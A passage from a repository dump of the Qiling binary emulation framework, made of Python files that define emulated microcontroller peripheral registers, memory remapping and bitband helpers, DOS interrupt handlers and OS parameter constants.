| ODRDY = 1 << 16 35 | ODSWRDY = 1 << 17 36 | UDRDY = 0x3 << 18 37 | -------------------------------------------------------------------------------- /qiling/hw/dma/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from .sam3xa_pdc import SAM3xaPdc 7 | from .stm32f1xx_dma import STM32F1xxDma 8 | from .stm32f4xx_dma import STM32F4xxDma 9 | from .gd32vf1xx_dma import GD32VF1xxDma -------------------------------------------------------------------------------- /qiling/hw/dma/sam3xa_pdc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import ctypes 7 | 8 | from qiling.hw.peripheral import QlPeripheral 9 | 10 | 11 | class SAM3xaPdc(QlPeripheral): 12 | class Type(ctypes.Structure): 13 | _fields_ = [ 14 | ("RPR" , ctypes.c_uint32), # (Pdc Offset: 0x0) Receive Pointer Register 15 | ("RCR" , ctypes.c_uint32), # (Pdc Offset: 0x4) Receive Counter Register 16 | ("TPR" , ctypes.c_uint32), # (Pdc Offset: 0x8) Transmit Pointer Register 17 | ("TCR" , ctypes.c_uint32), # (Pdc Offset: 0xC) Transmit Counter Register 18 | ("RNPR", ctypes.c_uint32), # (Pdc Offset: 0x10) Receive Next Pointer Register 19 | ("RNCR", ctypes.c_uint32), # (Pdc Offset: 0x14) Receive Next Counter Register 20 | ("TNPR", ctypes.c_uint32), # (Pdc Offset: 0x18) Transmit Next Pointer Register 21 | ("TNCR", ctypes.c_uint32), # (Pdc Offset: 0x1C) Transmit Next Counter Register 22 | ("PTCR", ctypes.c_uint32), # (Pdc Offset: 0x20) Transfer Control Register 23 | ("PTSR", ctypes.c_uint32), # (Pdc Offset: 0x24) Transfer Status Register 24 | ] 25 | 26 | def __init__(self, ql, label): 27 | super().__init__(ql, label) 28 | 29 | self.instance = self.struct() 30 | -------------------------------------------------------------------------------- /qiling/hw/external_device/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | -------------------------------------------------------------------------------- /qiling/hw/external_device/lcd/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | -------------------------------------------------------------------------------- /qiling/hw/external_device/oled/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | -------------------------------------------------------------------------------- /qiling/hw/flash/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from .stm32f1xx_flash import STM32F1xxFlash 7 | from .stm32f4xx_flash import STM32F4xxFlash 8 | from .sam3xa_efc import SAM3xaEfc -------------------------------------------------------------------------------- /qiling/hw/flash/sam3xa_efc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import ctypes 7 | 8 | from qiling.hw.peripheral import QlPeripheral 9 | 10 | 11 | class SAM3xaEfc(QlPeripheral): 12 | class Type(ctypes.Structure): 13 | _fields_ = [ 14 | ("FMR", ctypes.c_uint32), # (Efc Offset: 0x00) EEFC Flash Mode Register 15 | ("FCR", ctypes.c_uint32), # (Efc Offset: 0x04) EEFC Flash Command Register 16 | ("FSR", ctypes.c_uint32), # (Efc Offset: 0x08) EEFC Flash Status Register 17 | ("FRR", ctypes.c_uint32), # (Efc Offset: 0x0C) EEFC Flash Result Register 18 | ] 19 | 20 | def __init__(self, ql, label, intn = None): 21 | super().__init__(ql, label) 22 | 23 | self.instance = self.struct() 24 | self.intn = intn 25 | -------------------------------------------------------------------------------- /qiling/hw/gpio/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from .stm32f1xx_gpio import STM32F1xxGpio 7 | from .stm32f1xx_afio import STM32F1xxAfio 8 | from .stm32f4xx_gpio import STM32F4xxGpio 9 | from .gd32vf1xx_gpio import GD32VF1xxGpio 10 | from .sam3xa_pio import SAM3xaPio 11 | from .mk64f12_gpio import MK64F12Gpio 12 | from .mk64f12_port import MK64F12Port 13 | -------------------------------------------------------------------------------- /qiling/hw/gpio/hooks.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | 7 | class GpioHooks: 8 | def __init__(self, ql, pin_num): 9 | self.ql = ql 10 | self.hook_set_func = [None] * pin_num 11 | self.hook_reset_func = [None] * pin_num 12 | 13 | def hook_set(self, pin, func, *args, **kwargs): 14 | self.hook_set_func[pin] = (func, args, kwargs) 15 | 16 | def hook_reset(self, pin, func, *args, **kwargs): 17 | self.hook_reset_func[pin] = (func, args, kwargs) 18 | 19 | def hook_del_set(self, pin): 20 | self.hook_set_func[pin] = None 21 | 22 | def hook_del_reset(self, pin): 23 | self.hook_reset_func[pin] = None 24 | 25 | def call_hook_set(self, pin): 26 | if self.hook_set_func[pin]: 27 | func, args, kwargs = self.hook_set_func[pin] 28 | func(*args, **kwargs) 29 | 30 | def call_hook_reset(self, pin): 31 | if self.hook_reset_func[pin]: 32 | func, args, kwargs = self.hook_reset_func[pin] 33 | func(*args, **kwargs) -------------------------------------------------------------------------------- /qiling/hw/i2c/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from .stm32f1xx_i2c import STM32F1xxI2c 7 | from .stm32f4xx_i2c import STM32F4xxI2c 8 | from .gd32vf1xx_i2c import GD32VF1xxI2c -------------------------------------------------------------------------------- /qiling/hw/i2c/stm32f1xx_i2c.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import ctypes 7 | 8 | 9 | from qiling.hw.peripheral import QlPeripheral 10 | from .stm32f4xx_i2c import STM32F4xxI2c 11 | 12 | 13 | class STM32F1xxI2c(STM32F4xxI2c): 14 | class Type(ctypes.Structure): 15 | """ the structure available in : 16 | stm32f100xb 17 | stm32f100xe 18 | stm32f101xb 19 | stm32f101xe 20 | stm32f101xg 21 | stm32f102xb 22 | stm32f103xb 23 | stm32f103xe 24 | stm32f103xg 25 | stm32f105xc 26 | stm32f107xc 27 | """ 28 | 29 | _fields_ = [ 30 | ("CR1" , ctypes.c_uint32), 31 | ("CR2" , ctypes.c_uint32), 32 | ("OAR1" , ctypes.c_uint32), 33 | ("OAR2" , ctypes.c_uint32), 34 | ("DR" , ctypes.c_uint32), 35 | ("SR1" , ctypes.c_uint32), 36 | ("SR2" , ctypes.c_uint32), 37 | ("CCR" , ctypes.c_uint32), 38 | ("TRISE", ctypes.c_uint32), 39 | ] 40 | -------------------------------------------------------------------------------- /qiling/hw/intc/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from .cm3_nvic import CortexM3Nvic 7 | from .cm4_nvic import CortexM4Nvic 8 | from .stm32f1xx_exti import STM32F1xxExti 9 | from .stm32f4xx_exti import STM32F4xxExti 10 | from .gd32vf1xx_eclic import GD32VF1xxEclic 11 | -------------------------------------------------------------------------------- /qiling/hw/intc/cm3_nvic.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from qiling.hw.intc.cm_nvic import CortexMNvic 7 | 8 | class CortexM3Nvic(CortexMNvic): 9 | pass 10 | -------------------------------------------------------------------------------- /qiling/hw/intc/cm4_nvic.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from qiling.hw.intc.cm_nvic import CortexMNvic 7 | 8 | class CortexM4Nvic(CortexMNvic): 9 | pass 10 | -------------------------------------------------------------------------------- /qiling/hw/math/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from .stm32f4xx_crc import STM32F4xxCrc 7 | from .gd32vf1xx_crc import GD32VF1xxCrc -------------------------------------------------------------------------------- /qiling/hw/math/gd32vf1xx_crc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | 7 | import ctypes 8 | 9 | from qiling.hw.peripheral import QlPeripheral 10 | 11 | 12 | class GD32VF1xxCrc(QlPeripheral): 13 | class Type(ctypes.Structure): 14 | """ cyclic redundancy check calculation unit 15 | """ 16 | 17 | _fields_ = [ 18 | ("DATA" , ctypes.c_uint32), # Address offset: 0x0, Data register 19 | ("FDATA", ctypes.c_uint32), # Address offset: 0x04, Free data register 20 | ("CTL" , ctypes.c_uint32), # Address offset: 0x08, Control register 21 | ] 22 | 23 | def __init__(self, ql, label): 24 | super().__init__(ql, label) 25 | 26 | self.instance = self.struct( 27 | DATA = 0xffffffff, 28 | FDATA = 0x00000000, 29 | CTL = 0x00000000, 30 | ) 31 | 32 | -------------------------------------------------------------------------------- /qiling/hw/mem/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from .cm_bitband import CortexMBitband 7 | from .remap import MemoryRemap 8 | from .kinetis_bme import KinetisBME 9 | -------------------------------------------------------------------------------- /qiling/hw/mem/cm_bitband.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from qiling.hw.peripheral import QlPeripheral 7 | 8 | 9 | class CortexMBitband(QlPeripheral): 10 | def __init__(self, ql, label, base, size): 11 | super().__init__(ql, label) 12 | 13 | self.bitband_base = base 14 | self.bitband_size = size * 32 15 | 16 | def _bitband_addr(self, offset): 17 | return self.bitband_base | (offset & 0x1ffffff) >> 5 18 | 19 | @property 20 | def region(self): 21 | return [(0, self.bitband_size)] 22 | 23 | def read(self, offset, size): 24 | addr = self._bitband_addr(offset) & (-size) 25 | buf = self.ql.mem.read(addr, size) 26 | 27 | bitpos = (offset >> 2) & ((size * 8) - 1) 28 | bit = (buf[bitpos >> 3] >> (bitpos & 7)) & 1 29 | 30 | return bit 31 | 32 | def write(self, offset, size, value): 33 | addr = self._bitband_addr(offset) & (-size) 34 | buf = self.ql.mem.read(addr, size) 35 | 36 | bitpos = (offset >> 2) & ((size * 8) - 1) 37 | bit = 1 << (bitpos & 7) 38 | if value & 1: 39 | buf[bitpos >> 3] |= bit 40 | else: 41 | buf[bitpos >> 3] &= ~bit 42 | 43 | self.ql.mem.write(addr, bytes(buf)) 44 | -------------------------------------------------------------------------------- /qiling/hw/mem/remap.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from qiling.hw.peripheral import QlPeripheral 7 | 8 | 9 | class MemoryRemap(QlPeripheral): 10 | def __init__(self, ql, label, base, size): 11 | super().__init__(ql, label) 12 | 13 | self.remap_base = base 14 | self.remap_size = size 15 | 16 | @property 17 | def region(self): 18 | return [(0, self.remap_size)] 19 | 20 | def read(self, offset, size): 21 | return int.from_bytes(self.ql.mem.read(self.remap_base + offset, size), 'little') 22 | 23 | def write(self, offset, size, value): 24 | return self.ql.mem.write(self.remap_base + offset, (value).to_bytes(size, 'little')) 25 | -------------------------------------------------------------------------------- /qiling/hw/misc/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from .cm3_scb import CortexM3Scb 7 | from .cm4_scb import CortexM4Scb 8 | from .sam3xa_wdt import SAM3xaWdt 9 | from .stm32f1xx_rcc import STM32F1xxRcc 10 | from .stm32f4xx_rcc import STM32F4xxRcc 11 | from .stm32f4xx_rcc_derive import ( 12 | STM32F4xxRccV1, STM32F4xxRccV2, 13 | STM32F4xxRccV3, 14 | STM32F446Rcc, STM32F412Rcc, 15 | ) 16 | from .stm32f4xx_syscfg import STM32F4xxSyscfg 17 | from .stm32f4xx_dbg import STM32F4xxDbgmcu 18 | from .gd32vf1xx_rcu import GD32VF1xxRcu 19 | from .mk64f12_sim import MK64F12Sim 20 | from .mk64f12_smc import MK64F12Smc 21 | from .mk64f12_mcg import MK64F12Mcg 22 | from .mk64f12_wdog import MK64F12Wdog 23 | -------------------------------------------------------------------------------- /qiling/hw/misc/cm3_scb.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | 7 | import ctypes 8 | 9 | from qiling.hw.misc.cm_scb import CortexMScb 10 | 11 | 12 | class CortexM3Scb(CortexMScb): 13 | class Type(ctypes.Structure): 14 | _fields_ = [ 15 | ('CPUID' , ctypes.c_uint32), 16 | ('ICSR' , ctypes.c_uint32), 17 | ('VTOR' , ctypes.c_uint32), 18 | ('AIRCR' , ctypes.c_uint32), 19 | ('SCR' , ctypes.c_uint32), 20 | ('CCR' , ctypes.c_uint32), 21 | ('SHP' , ctypes.c_uint8 * 12), 22 | ('SHCSR' , ctypes.c_uint32), 23 | ('CFSR' , ctypes.c_uint32), 24 | ('HFSR' , ctypes.c_uint32), 25 | ('DFSR' , ctypes.c_uint32), 26 | ('MMFAR' , ctypes.c_uint32), 27 | ('BFSR' , ctypes.c_uint32), 28 | ] 29 | 30 | def __init__(self, ql, label): 31 | super().__init__(ql, label) 32 | 33 | self.instance = self.struct( 34 | CPUID = 0x411FC231, 35 | AIRCR = 0xFA050000, 36 | ) 37 | -------------------------------------------------------------------------------- /qiling/hw/misc/mk64f12_smc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import ctypes 7 | 8 | from qiling.hw.peripheral import QlPeripheral 9 | 10 | 11 | class MK64F12Smc(QlPeripheral): 12 | class Type(ctypes.Structure): 13 | """ System Mode Controller """ 14 | _fields_ = [ 15 | ("PMPROT" , ctypes.c_uint8), # Power Mode Protection register 16 | ("PMCTRL" , ctypes.c_uint8), # Power Mode Control register 17 | ("VLLSCTRL", ctypes.c_uint8), # VLLS Control register 18 | ("PMSTAT" , ctypes.c_uint8), # Power Mode Status register 19 | ] 20 | -------------------------------------------------------------------------------- /qiling/hw/misc/sam3xa_wdt.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import ctypes 7 | 8 | from qiling.hw.peripheral import QlPeripheral 9 | 10 | 11 | class SAM3xaWdt(QlPeripheral): 12 | """ 13 | The Watchdog Timer can be used to prevent system lock-up if the software becomes trapped in a deadlock. It 14 | features a 12-bit down counter that allows a watchdog period of up to 16 seconds (slow clock at 32.768 kHz). It 15 | can generate a general reset or a processor reset only. In addition, it can be stopped while the processor is in 16 | debug mode or idle mode. 17 | """ 18 | 19 | class Type(ctypes.Structure): 20 | _fields_ = [ 21 | ("CR", ctypes.c_uint32), # (Wdt Offset: 0x00) Control Register 22 | ("MR", ctypes.c_uint32), # (Wdt Offset: 0x04) Mode Register 23 | ("SR", ctypes.c_uint32), # (Wdt Offset: 0x08) Status Register 24 | ] 25 | 26 | def __init__(self, ql, label, intn = None): 27 | super().__init__(ql, label) 28 | 29 | self.instance = self.struct() 30 | self.intn = intn 31 | -------------------------------------------------------------------------------- /qiling/hw/misc/stm32f4xx_syscfg.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import ctypes 7 | from qiling.hw.peripheral import QlPeripheral 8 | 9 | 10 | class STM32F4xxSyscfg(QlPeripheral): 11 | class Type(ctypes.Structure): 12 | """ the structure available in : 13 | stm32f407xx.h 14 | stm32f469xx.h 15 | stm32f427xx.h 16 | stm32f401xc.h 17 | stm32f415xx.h 18 | stm32f439xx.h 19 | stm32f417xx.h 20 | stm32f479xx.h 21 | stm32f429xx.h 22 | stm32f437xx.h 23 | stm32f401xe.h 24 | stm32f405xx.h 25 | stm32f411xe.h 26 | """ 27 | 28 | _fields_ = [ 29 | ('MEMRMP' , ctypes.c_uint32), # SYSCFG memory remap register, Address offset: 0x00 30 | ('PMC' , ctypes.c_uint32), # SYSCFG peripheral mode configuration register, Address offset: 0x04 31 | ('EXTICR' , ctypes.c_uint32 * 4), # SYSCFG external interrupt configuration registers, Address offset: 0x08-0x14 32 | ('RESERVED', ctypes.c_uint32 * 2), # Reserved, 0x18-0x1C 33 | ('CMPCR' , ctypes.c_uint32), # SYSCFG Compensation cell control register, Address offset: 0x20 34 | ] -------------------------------------------------------------------------------- /qiling/hw/net/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from .stm32f4xx_eth import STM32F4xxEth 7 | -------------------------------------------------------------------------------- /qiling/hw/power/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from .stm32f4xx_pwr import STM32F4xxPwr 7 | from .sam3xa_pmc import SAM3xaPmc 8 | -------------------------------------------------------------------------------- /qiling/hw/sd/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from .stm32f4xx_sdio import STM32F4xxSdio -------------------------------------------------------------------------------- /qiling/hw/spi/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from .sam3xa_spi import SAM3xaSpi 7 | from .stm32f1xx_spi import STM32F1xxSpi 8 | from .stm32f4xx_spi import STM32F4xxSpi 9 | from .gd32vf1xx_spi import GD32VF1xxSpi 10 | from .mk64f12_spi import MK64F12Spi 11 | -------------------------------------------------------------------------------- /qiling/hw/timer/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from .sam3xa_tc import SAM3xaTc 7 | from .cm3_systick import CortexM3SysTick 8 | from .cm4_systick import CortexM4SysTick 9 | from .stm32f1xx_tim import STM32F1xxTim 10 | from .stm32f4xx_rtc import STM32F4xxRtc 11 | from .stm32f4xx_tim import STM32F4xxTim 12 | from .gd32vf1xx_rtc import GD32VF1xxRtc 13 | from .gd32vf1xx_timer import GD32VF1xxTimer 14 | from .mk64f12_ftm import MK64F12Ftm 15 | from .mk64f12_osc import MK64F12Osc 16 | from .mk64f12_rtc import MK64F12Rtc 17 | -------------------------------------------------------------------------------- /qiling/hw/timer/cm3_systick.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from qiling.hw.timer.cm_systick import CortexMSysTick 7 | 8 | 9 | class CortexM3SysTick(CortexMSysTick): 10 | pass 11 | -------------------------------------------------------------------------------- /qiling/hw/timer/cm4_systick.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from qiling.hw.timer.cm_systick import CortexMSysTick 7 | 8 | 9 | class CortexM4SysTick(CortexMSysTick): 10 | pass 11 | -------------------------------------------------------------------------------- /qiling/hw/timer/mk64f12_osc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import ctypes 7 | 8 | from qiling.hw.peripheral import QlPeripheral 9 | 10 | class MK64F12Osc(QlPeripheral): 11 | class Type(ctypes.Structure): 12 | """ Oscillator """ 13 | _fields_ = [ 14 | ("CR", ctypes.c_uint8), # OSC Control Register 15 | ] 16 | -------------------------------------------------------------------------------- /qiling/hw/timer/mk64f12_rtc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import ctypes 7 | 8 | from qiling.hw.peripheral import QlPeripheral 9 | 10 | 11 | class MK64F12Rtc(QlPeripheral): 12 | class Type(ctypes.Structure): 13 | """ Secure Real Time Clock """ 14 | _fields_ = [ 15 | ("TSR", ctypes.c_uint32), # RTC Time Seconds Register 16 | ("TPR", ctypes.c_uint32), # RTC Time Prescaler Register 17 | ("TAR", ctypes.c_uint32), # RTC Time Alarm Register 18 | ("TCR", ctypes.c_uint32), # RTC Time Compensation Register 19 | ("CR" , ctypes.c_uint32), # RTC Control Register 20 | ("SR" , ctypes.c_uint32), # RTC Status Register 21 | ("LR" , ctypes.c_uint32), # RTC Lock Register 22 | ("IER", ctypes.c_uint32), # RTC Interrupt Enable Register 23 | ("WAR", ctypes.c_uint32), # RTC Write Access Register 24 | ("RAR", ctypes.c_uint32), # RTC Read Access Register 25 | ] 26 | 27 | def __init__(self, ql, label, intn=None, seconds_intn=None): 28 | super().__init__(ql, label) 29 | 30 | self.intn = intn -------------------------------------------------------------------------------- /qiling/hw/timer/stm32f1xx_tim.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | 7 | import ctypes 8 | 9 | from .stm32f4xx_tim import STM32F4xxTim 10 | 11 | 12 | class STM32F1xxTim(STM32F4xxTim): 13 | pass 14 | -------------------------------------------------------------------------------- /qiling/hw/timer/timer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import ctypes 7 | 8 | from qiling.core import Qiling 9 | from qiling.hw.peripheral import QlPeripheral 10 | 11 | 12 | class QlTimerPeripheral(QlPeripheral): 13 | def __init__(self, ql: Qiling, label: str): 14 | super().__init__(ql, label) 15 | 16 | self._ratio = 1 17 | 18 | def set_ratio(self, ratio): 19 | self._ratio = ratio 20 | 21 | @property 22 | def ratio(self): 23 | return self._ratio 24 | 25 | @ratio.setter 26 | def ratio(self, value): 27 | self.set_ratio(value) 28 | 29 | def save(self): 30 | return (self._ratio, bytes(self.instance)) 31 | 32 | def restore(self, data): 33 | self._ratio, raw = data 34 | ctypes.memmove(ctypes.addressof(self.instance), raw, len(raw)) 35 | -------------------------------------------------------------------------------- /qiling/hw/utils/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | -------------------------------------------------------------------------------- /qiling/hw/utils/bcd.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | 7 | def byte2bcd(value): 8 | bcdhigh = 0 9 | while value >= 10: 10 | bcdhigh += 1 11 | value -= 10 12 | 13 | return (bcdhigh << 4) | value 14 | 15 | def bcd2byte(value): 16 | return ((value & 0xF0) >> 0x4) * 10 + (value & 0xf) -------------------------------------------------------------------------------- /qiling/loader/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/qiling/loader/__init__.py -------------------------------------------------------------------------------- /qiling/loader/blob.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from qiling import Qiling 7 | from qiling.loader.loader import QlLoader 8 | from qiling.os.memory import QlMemoryHeap 9 | 10 | class QlLoaderBLOB(QlLoader): 11 | def __init__(self, ql: Qiling): 12 | super().__init__(ql) 13 | 14 | self.load_address = 0 15 | 16 | def run(self): 17 | self.load_address = self.ql.os.entry_point # for consistency 18 | 19 | self.ql.mem.map(self.ql.os.entry_point, self.ql.os.code_ram_size, info="[code]") 20 | self.ql.mem.write(self.ql.os.entry_point, self.ql.code) 21 | 22 | heap_address = self.ql.os.entry_point + self.ql.os.code_ram_size 23 | heap_size = int(self.ql.os.profile.get("CODE", "heap_size"), 16) 24 | self.ql.os.heap = QlMemoryHeap(self.ql, heap_address, heap_address + heap_size) 25 | 26 | self.ql.arch.regs.arch_sp = heap_address - 0x1000 27 | 28 | return 29 | -------------------------------------------------------------------------------- /qiling/loader/macho_parser/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/qiling/loader/macho_parser/__init__.py -------------------------------------------------------------------------------- /qiling/os/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/qiling/os/__init__.py -------------------------------------------------------------------------------- /qiling/os/blob/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/qiling/os/blob/__init__.py -------------------------------------------------------------------------------- /qiling/os/const.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | 5 | # global primitive types used in fcalls and api hooks. 6 | # 7 | # operating systems may map their own types to these, or create additional ones 8 | # with custom resolvers (see: QlOs) 9 | PARAM_INT8 = 1 10 | PARAM_INT16 = 2 11 | PARAM_INT32 = 3 12 | PARAM_INT64 = 4 13 | PARAM_INTN = 5 14 | 15 | # a generic pointer type that may be used to index pointed types 16 | PARAM_PTRX = 128 17 | 18 | # common alises to primitive types. 19 | # TODO: let each OS define its own aliases and types 20 | BYTE = PARAM_INT8 21 | DWORD = PARAM_INT32 22 | INT = PARAM_INT32 23 | UINT = PARAM_INT32 24 | BOOL = PARAM_INT32 25 | LONGLONG = PARAM_INT64 26 | ULONGLONG = PARAM_INT64 27 | SIZE_T = PARAM_INTN 28 | POINTER = PARAM_INTN 29 | HANDLE = PARAM_INTN 30 | STRING = PARAM_PTRX + 1 31 | WSTRING = PARAM_PTRX + 2 32 | GUID = PARAM_PTRX + 3 33 | -------------------------------------------------------------------------------- /qiling/os/dos/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/qiling/os/dos/__init__.py -------------------------------------------------------------------------------- /qiling/os/dos/interrupts/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from typing import Mapping, Callable 7 | 8 | from qiling import Qiling 9 | 10 | from . import int10 11 | from . import int13 12 | from . import int15 13 | from . import int16 14 | from . import int19 15 | from . import int1a 16 | from . import int20 17 | from . import int21 18 | 19 | IntHandler = Callable[[Qiling], None] 20 | 21 | # http://spike.scu.edu.au/~barry/interrupts.html 22 | # http://www2.ift.ulaval.ca/~marchand/ift17583/dosints.pdf 23 | 24 | handlers: Mapping[int, IntHandler] = { 25 | 0x10: int10.handler, 26 | 0x13: int13.handler, 27 | 0x15: int15.handler, 28 | 0x16: int16.handler, 29 | 0x19: int19.handler, 30 | 0x1a: int1a.handler, 31 | 0x20: int20.handler, 32 | 0x21: int21.handler 33 | } 34 | 35 | __all__ = ['handlers'] 36 | -------------------------------------------------------------------------------- /qiling/os/dos/interrupts/int19.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from qiling import Qiling 7 | 8 | def handler(ql: Qiling): 9 | # Note: Memory is not cleaned. 10 | dl = ql.arch.regs.dl 11 | 12 | if ql.os.fs_mapper.has_mapping(dl): 13 | disk = ql.os.fs_mapper.open(dl, None) 14 | disk.lseek(0, 0) 15 | mbr = disk.read(512) 16 | else: 17 | with open(ql.path, "rb") as f: 18 | mbr = f.read() 19 | 20 | ql.mem.write(0x7C00, mbr) 21 | 22 | ql.arch.regs.cs = 0x07C0 23 | ql.arch.regs.ip = 0x0000 24 | -------------------------------------------------------------------------------- /qiling/os/dos/interrupts/int20.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from qiling import Qiling 7 | 8 | def __leaf_13(self): 9 | pass 10 | 11 | def handler(ql: Qiling): 12 | ah = ql.arch.regs.ah 13 | 14 | leaffunc = { 15 | 0x13 : __leaf_13 16 | }.get(ah) 17 | 18 